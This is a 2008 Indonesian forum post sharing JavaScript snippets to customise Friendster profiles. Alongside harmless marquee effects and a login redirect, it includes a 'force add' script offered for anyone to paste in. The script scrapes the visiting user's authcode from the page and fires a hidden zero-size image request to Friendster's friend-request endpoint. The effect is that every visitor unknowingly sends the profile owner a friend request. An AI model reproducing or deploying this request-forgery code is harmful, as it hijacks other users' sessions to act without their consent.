[quote=metropolix]bro sekya...
main nav flash itu apa maksudnya...
n efeknya dia di profile di bagian mana??
n dmn bisa ngedapetin objek pengganti menunya??
[/quote]
baca di sini bro...[url=http://theftalk.com/viewtopic.php?pid=378902#p378902]GANTI MENU DGN FLASH[/url]
[b]Bro yasir[/b]
[b]force login[/b]
[quote]//force log in
if(pageViewerID==""){
alert("[b]YOUR TEXT HERE[/b]");
top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1";
}
//onload handler
function onProfileLoad() {
//addboxes here[/quote]
[b]force add[/b]
[quote]var afaimg = document.createElement('span');
afaimg.id = "[b]addme[/b]";
document.getElementsByTagName('head')[0].appendChild(afaimg);
function afa() {
var eadd = "[b]EMAIL KAMU[/b]";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};[/quote]
[b]marque shout out[/b]
[quote]function movingE() {
var marqueeSbox = document.getElementById('cpShoutoutBox').innerHTML;
var liwzdarE = document.getElementById('cpShoutoutBox');
liwzdarE.innerHTML ="<marquee id=\"marquee\" direction=\"left\" height=\"100%\" scrollamount=\"2\" onMouseOver=\"stop()\" onMouseOut=\"start()\">"+marqueeSbox+"<marquee>";
}
window.onload = function() {movingE();}[/quote]
[b]marque aboutme[/b]
[quote]function movingC() {
var marqueeMoreAbout = document.getElementById('content_moreabout_1_5').innerHTML;
var liwzdarC = document.getElementById('content_moreabout_1_5');
liwzdarC.innerHTML ="<marquee id=\"marquee\" direction=\"up\" height=\"300\" scrollamount=\"2\" onMouseOver=\"stop()\" onMouseOut=\"start()\">"+marqueeMoreAbout+"<marquee>";
}
window.onload = function() {movingC();}[/quote]
Last edited by sekya (2008-02-09 08:03:04)